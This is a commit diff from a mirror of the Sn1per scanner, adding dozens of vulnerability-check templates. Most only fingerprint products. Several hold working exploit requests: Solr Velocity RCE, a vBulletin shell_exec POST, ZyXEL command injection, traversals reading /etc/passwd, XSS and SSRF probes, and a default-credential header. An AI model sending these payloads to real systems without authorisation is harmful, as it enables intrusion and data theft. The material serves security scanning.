mirror of https://github.com/1N3/Sn1per.git
Sn1per Community Edition by @xer0dayz - https://xerosecurity.com
This commit is contained in:
parent
bdcdfa4380
commit
3ab10a32e4
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='ApPHP MicroBlog Remote Code Execution Vulnerability'
|
||||
URI='/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/'
|
||||
METHOD='GET'
|
||||
MATCH="<title>phpinfo\(\)"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Apache Solr Detected'
|
||||
URI='/'
|
||||
METHOD='GET'
|
||||
MATCH='<title>Solr Admin</title>'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2018-13379 - Fortigate Pulse Connect Secure Directory Traversal'
|
||||
URI='/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
|
||||
METHOD='GET'
|
||||
MATCH='\.\.\.\.\.\.\.\.\.\.\.\.\.'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read'
|
||||
URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
|
||||
METHOD='GET'
|
||||
MATCH='root\:'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-11581 - Jira Template Injection'
|
||||
URI='/secure/ContactAdministrators!default.jspa'
|
||||
METHOD='GET'
|
||||
MATCH='Contact Site Administrators'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-1653 - Cisco RV320 RV326 Configuration Disclosure'
|
||||
URI="/cgi-bin/config.exp"
|
||||
METHOD='GET'
|
||||
MATCH="sysconfig"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution'
|
||||
URI='/'
|
||||
METHOD='POST'
|
||||
MATCH='1337'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="-d 'routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27echo+$((1%2B1336))%27%29%3B+exit%3B' -H 'Content-Type: application/x-www-form-urlencoded' --user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-17558 - Apache Solr RCE'
|
||||
URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
|
||||
METHOD='GET'
|
||||
MATCH='root\:'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal'
|
||||
URI='/vpn/../vpns/cfg/smb.conf'
|
||||
METHOD='GET'
|
||||
MATCH='\[global\]'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS'
|
||||
URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
|
||||
METHOD='GET'
|
||||
MATCH="<svg/onload=alert\(1337\)>"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-5418 - File Content Disclosure on Rails'
|
||||
URI="/../../../../../../../../etc/passwd\{\{"
|
||||
METHOD='GET'
|
||||
MATCH="root\:"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-8451 Jira SSRF 1'
|
||||
URI="/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
|
||||
METHOD='GET'
|
||||
MATCH='<title>Google</title>'
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-8451 Jira SSRF 2'
|
||||
URI="/jira/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
|
||||
METHOD='GET'
|
||||
MATCH='<title>Google</title>'
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-8451 Jira SSRF 3'
|
||||
URI="/wiki/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
|
||||
METHOD='GET'
|
||||
MATCH='<title>Google</title>'
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-8451 Jira SSRF 4'
|
||||
URI="/confluence/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
|
||||
METHOD='GET'
|
||||
MATCH='<title>Google</title>'
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-8903 - Totaljs - Unathenticated Directory Traversal'
|
||||
URI="/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
|
||||
METHOD='GET'
|
||||
MATCH="apache2\.conf"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2019-8982 - Wavemaker Studio 6.6 LFI/SSRF'
|
||||
URI="/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
|
||||
METHOD='GET'
|
||||
MATCH="root\:"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-12271 - Sophos XG Firewall Pre-Auth SQL Injection'
|
||||
URI='/userportal/webpages/myaccount/login.jsp'
|
||||
METHOD='GET'
|
||||
MATCH='loginstylesheet'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2096 - Jenkins Gitlab Hook XSS'
|
||||
URI="/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
|
||||
METHOD='GET'
|
||||
MATCH="<svg/onload=alert\(1337\)>"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 1'
|
||||
URI="/git/build_now/a'\"><svg/onload=alert(document.domain)>"
|
||||
METHOD='GET'
|
||||
MATCH="Gitlab Web Hook"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 2'
|
||||
URI="/jenkins/git/build_now/a'\"><svg/onload=alert(document.domain)>"
|
||||
METHOD='GET'
|
||||
MATCH="Gitlab Web Hook"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 3'
|
||||
URI="/gitlab/build_now/a'\"><svg/onload=alert(document.domain)>"
|
||||
METHOD='GET'
|
||||
MATCH="Gitlab Web Hook"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 4'
|
||||
URI="/jenkins/gitlab/build_now/a'\"><svg/onload=alert(document.domain)>"
|
||||
METHOD='GET'
|
||||
MATCH="Gitlab Web Hook"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-2555 - WebLogic Server Deserialization RCE'
|
||||
URI="/console/login/LoginForm.jsp"
|
||||
METHOD='GET'
|
||||
MATCH="WebLogic"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-5284 - Next JS Limited Path Traversal'
|
||||
URI="/_next/static/../server/pages-manifest.json"
|
||||
METHOD='GET'
|
||||
MATCH='\{\"/_app\":\".*?_app\.js\"'
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-7246 - qdPM Authenticated Remote Code Execution'
|
||||
URI="/"
|
||||
METHOD='GET'
|
||||
MATCH='qdPM 9.'
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-7473 Citrix ShareFile StorageZones Unauthenticated Access'
|
||||
URI="/UploadTest.aspx"
|
||||
METHOD='GET'
|
||||
MATCH="content\-length\:\ 0"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS='-L -I --user-agent '' -s --insecure'
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-8115 - Revive Adserver XSS'
|
||||
URI="/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
|
||||
METHOD='GET'
|
||||
MATCH='alert\(1337\)'
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-9054 - ZyXEL NAS Remote Code Execution'
|
||||
URI="/cgi-bin/weblogin.cgi?username=admin';echo \$((1+1336))"
|
||||
METHOD='GET'
|
||||
MATCH="1337"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Citrix-Access-Gateway Detected'
|
||||
URI='/vpn/index.html'
|
||||
METHOD='GET'
|
||||
MATCH='Netscaler Gateway'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Citrix VPN Detected'
|
||||
URI='/vpn/index.html'
|
||||
METHOD='GET'
|
||||
MATCH='Gateway'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Clear-Text Protocol - HTTP'
|
||||
URI='/'
|
||||
METHOD='GET'
|
||||
MATCH='200 OK'
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Common Status File Detected 1'
|
||||
URI='/.perf'
|
||||
METHOD='GET'
|
||||
MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
|
||||
SEVERITY='P4 - LOW'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Common Status File Detected 2'
|
||||
URI='/server-status'
|
||||
METHOD='GET'
|
||||
MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
|
||||
SEVERITY='P4 - LOW'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Common Status File Detected 3'
|
||||
URI='/status.html'
|
||||
METHOD='GET'
|
||||
MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
|
||||
SEVERITY='P4 - LOW'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Atlassian Confluence Detected'
|
||||
URI='/'
|
||||
METHOD='GET'
|
||||
MATCH="Atlassian\ Confluence"
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Contact Form 7 Wordpress Plugin Found 1'
|
||||
URI="/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt"
|
||||
METHOD='GET'
|
||||
MATCH='Contact Form 7'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Contact Form 7 Wordpress Plugin Found 2'
|
||||
URI="/wordpress/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt"
|
||||
METHOD='GET'
|
||||
MATCH='Contact Form 7'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Drupal Detected 1'
|
||||
URI='/'
|
||||
METHOD='GET'
|
||||
MATCH="drupal\.org"
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Drupal Detected 3'
|
||||
URI='/drupal/'
|
||||
METHOD='GET'
|
||||
MATCH="drupal\.org"
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Drupal Detected 2'
|
||||
URI='/blog/'
|
||||
METHOD='GET'
|
||||
MATCH="drupal\.org"
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Drupal User Login'
|
||||
URI='/user/login?destination=/'
|
||||
METHOD='GET'
|
||||
MATCH='user-login-form'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Drupal Version Disclosure'
|
||||
URI='/core/install.php?profile=default'
|
||||
METHOD='GET'
|
||||
MATCH='site-version'
|
||||
SEVERITY='P4 - LOW'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Fortigate Pulse Connect Secure Detected'
|
||||
URI='/remote/login?lang=en'
|
||||
METHOD='GET'
|
||||
MATCH="<title>Please Login</title>"
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Git Config Detected 1'
|
||||
URI='/.git/config'
|
||||
METHOD='GET'
|
||||
MATCH="\[core\]"
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Jira Detected 1'
|
||||
URI='/secure/Dashboard.jspa'
|
||||
METHOD='GET'
|
||||
MATCH='Project Management Software'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Jira Detected 2'
|
||||
URI='/jira/secure/Dashboard.jspa'
|
||||
METHOD='GET'
|
||||
MATCH='Project Management Software'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Jira Detected'
|
||||
URI='/secure/ContactAdministrators!default.jspa'
|
||||
METHOD='GET'
|
||||
MATCH='Project Management Software'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Joomla Detected 1'
|
||||
URI='/'
|
||||
METHOD='GET'
|
||||
MATCH='content="Joomla! '
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Joomla Detected 1'
|
||||
URI='/joomla/'
|
||||
METHOD='GET'
|
||||
MATCH='content="Joomla! '
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Joomla Version Disclosure'
|
||||
URI='/administrator/manifests/files/joomla.xml'
|
||||
METHOD='GET'
|
||||
MATCH='Joomla version '
|
||||
SEVERITY='P4 - LOW'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='MS SQL Reporting Server Detected 1'
|
||||
URI='/ReportServer/pages/ReportViewer.aspx'
|
||||
METHOD='GET'
|
||||
MATCH='Microsoft\.Reporting'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='MS SQL Reporting Server Detected 2'
|
||||
URI='/Reports/Pages/Folder.aspx'
|
||||
METHOD='GET'
|
||||
MATCH='Microsoft\.Reporting'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='PHP Info Detected 1'
|
||||
URI='/phpinfo.php'
|
||||
METHOD='GET'
|
||||
MATCH='PHP Version '
|
||||
SEVERITY='P4 - LOW'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='PulseSecure VPN Detected'
|
||||
URI='/dana-na/auth/url_admin/welcome.cgi'
|
||||
METHOD='GET'
|
||||
MATCH='<title>SSL'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='RabbitMQ Management Default Credentials'
|
||||
URI="/api/whoami"
|
||||
METHOD='GET'
|
||||
MATCH="administrator"
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS='-H "Content-Type: application/json" -H "Authorization: Z3Vlc3Q6Z3Vlc3Q=" --user-agent '' -s -L --insecure'
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='SQLiteManager Detected'
|
||||
URI='/sqlite/'
|
||||
METHOD='GET'
|
||||
MATCH='<title>SQLiteManager'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Telerik File Upload Web UI'
|
||||
URI='/Telerik.Web.UI.WebResource.axd?type=rau'
|
||||
METHOD='GET'
|
||||
MATCH='RadAsyncUpload handler is registered succesfully'
|
||||
SEVERITY='P2 - HIGH'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,13 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Weak Authentication'
|
||||
URI='/'
|
||||
METHOD='GET'
|
||||
MATCH='realm\='
|
||||
SEVERITY='P4 - LOW'
|
||||
CURL_OPTS="-I -L --user-agent '' -s --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
||||
if [[ "$SSL" == "false" ]]; then
|
||||
SEVERITY='P2 - HIGH'
|
||||
fi
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='WebLogic Detected'
|
||||
URI='/console/login/LoginForm.jsp'
|
||||
METHOD='GET'
|
||||
MATCH='WebLogic'
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Web Config Detected 1'
|
||||
URI='/web.config'
|
||||
METHOD='GET'
|
||||
MATCH='<configuration>'
|
||||
SEVERITY='P4 - LOW'
|
||||
CURL_OPTS="-L --user-agent '' -s --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
